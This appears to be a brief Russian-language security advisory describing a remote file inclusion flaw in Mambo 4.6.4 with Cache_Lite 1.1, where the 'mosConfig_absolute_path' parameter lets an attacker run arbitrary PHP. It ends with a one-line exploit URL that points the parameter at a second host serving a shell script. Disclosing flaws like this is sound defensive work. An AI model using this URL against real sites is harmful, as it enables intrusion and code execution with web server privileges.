Программа:
Mambo 4.6.4
Cache_Lite 1.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в классе Cache_Lite в параметре «mosConfig_absolute_path».
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.

Эксплоит:

http://www.example.com/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://www.example2.com/shell?



Оставить мнение